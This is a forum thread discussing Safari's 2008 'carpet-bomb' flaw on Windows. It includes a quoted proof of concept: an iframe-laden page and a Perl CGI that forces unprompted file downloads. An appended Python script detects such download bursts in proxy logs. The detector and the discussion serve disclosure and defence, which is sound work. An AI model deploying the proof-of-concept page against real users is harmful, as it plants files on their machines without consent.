Apple's carpet-bomb Safari flaw can wreak havoc on Windows

seika
FTP Access
Posts: 140
Joined: Wed Jun 11, 2008 7:27 pm

Post by seika »

A researcher has created a proof-of-concept site that graphically demonstrates the risk Windows users face when using Apple's Safari browser.




Microsoft's security team already warned that a "blended threat" was so serious that Windows users should curtail their use of Safari until a security patch is available. This blog post from researcher Liu Die Yu makes it clear the warning was by no means overstated.

Clicking on this link with Safari using default settings automatically downloads a booby-trapped file onto a Windows user's desktop with no prompting. The next time the user opens Internet Explorer, the force-fed file automatically causes the notepad.exe application to launch and open a non-existent file. Of course, miscreants could choose far more nefarious code.

When informed that its browser downloads files with no prompting, Apple said it may get around to changing this behavior at some point. In other words, this is no big deal from a security perspective, so let's all move on. This demo suggests otherwise.

source: neowin.net

hounsell

Post by hounsell »

The thing with this, from what I heard, is that neither can completely fix it without the other. The flaw is in both Safari and Windows. Small holes in both that normally wouldn't be able to be exploited, take effect when used in conjunction.

seika
FTP Access
Posts: 140
Joined: Wed Jun 11, 2008 7:27 pm

Post by seika »

Well, it's another reason not to use Safari on Windows.

Frozenport
FTP Access
Posts: 1022
Joined: Fri Sep 01, 2006 10:04 pm
Location: The Ephemeral between existance and non-existance: AKA "being"

Post by Frozenport »

The only Windows users of Safari are web developers...
What is the flaw?
Part Time Troll - HPC Enthusiast - Spelling Master - Old Fart

pr0gram the pr0grammer
Donator
Posts: 698
Joined: Fri Aug 18, 2006 12:05 pm
Location: Or-stray-liagh

Post by pr0gram the pr0grammer »

[quote=http://www.dhanjani.com/archives/2008/0 ... _bomb.html]
Assume you visit a malicious site, http://malicious.example.com/, that serves the following HTML:

[code]
<HTML>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/ca ... "></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/ca ... "></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/ca ... "></iframe>
...
...
...
...
<iframe id="frame" src="http://malicious.example.com/cgi-bin/ca ... "></iframe>
</HTML>
[/code]

Now assume that http://malicious.example.com/cgi-bin/carpet_bomb.cgi is the following:

[code]
#!/usr/bin/perl
print "Content-type: blah/blah\n\n"
[/code]

Since Safari does not know how to render content-type of blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served.
[/quote]


Such simple exploit code o.O

And of course, Apple is being all arrogant and saying it's a feature not a bug. They said they will consider an "ask before downloading" checkbox in the next version of Safari.
pr0gram the pr0grammer
BetaArchive retiree | OSBA Expat
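
Added example, not part of any post in this thread and not code from the quoted article: a defender-side check that scans web-proxy records for the pattern the quote describes, one page triggering a burst of responses whose Content-Type the browser cannot render. The record layout, the list of renderable types, the threshold and window, and every sample record are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: media types the browser renders inline; anything else is saved to disk.
RENDERABLE_PREFIXES = ("text/", "image/", "audio/", "video/")
RENDERABLE_TYPES = {"application/javascript", "application/json",
                    "application/xhtml+xml", "application/xml"}

def is_forced_download(content_type):
    """True if a response with this Content-Type would be downloaded, not rendered."""
    media = content_type.split(";", 1)[0].strip().lower()
    return not (media.startswith(RENDERABLE_PREFIXES) or media in RENDERABLE_TYPES)

def find_carpet_bombs(records, threshold=3, window=timedelta(seconds=5)):
    """Return sorted (client, referer) pairs where a single page caused at least
    `threshold` non-renderable responses within `window`."""
    by_page = defaultdict(list)
    for ts, client, referer, _url, ctype in records:
        if referer and is_forced_download(ctype):
            by_page[(client, referer)].append(datetime.fromisoformat(ts))
    hits = set()
    for key, times in by_page.items():
        times.sort()
        # Sliding window: event i against the event threshold-1 positions earlier.
        for i in range(threshold - 1, len(times)):
            if times[i] - times[i - threshold + 1] <= window:
                hits.add(key)
                break
    return sorted(hits)

BOMB = "http://malicious.example.com/cgi-bin/carpet_bomb.cgi"
# Constructed sample records: (timestamp, client, referer, url, Content-Type)
SAMPLE = [
    ("2008-06-12T10:00:00", "10.0.0.5", "", "http://malicious.example.com/", "text/html"),
    ("2008-06-12T10:00:01", "10.0.0.5", "http://malicious.example.com/", BOMB, "blah/blah"),
    ("2008-06-12T10:00:01", "10.0.0.5", "http://malicious.example.com/", BOMB, "blah/blah"),
    ("2008-06-12T10:00:02", "10.0.0.5", "http://malicious.example.com/", BOMB, "blah/blah"),
    # One deliberate download from a page: below the threshold.
    ("2008-06-12T10:05:00", "10.0.0.7", "http://files.example.org/", "http://files.example.org/tool.zip", "application/zip"),
    # Three downloads from one page, but minutes apart: outside the window.
    ("2008-06-12T11:00:00", "10.0.0.9", "http://files.example.org/", "http://files.example.org/a.zip", "application/zip"),
    ("2008-06-12T11:04:00", "10.0.0.9", "http://files.example.org/", "http://files.example.org/b.zip", "application/zip"),
    ("2008-06-12T11:09:00", "10.0.0.9", "http://files.example.org/", "http://files.example.org/c.zip", "application/zip"),
]

if __name__ == "__main__":
    for client, page in find_carpet_bombs(SAMPLE):
        print(f"ALERT {client}: burst of forced downloads triggered by {page}")
```

Only the first client is flagged; the single download and the slow series of downloads stay below the threshold or outside the window.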
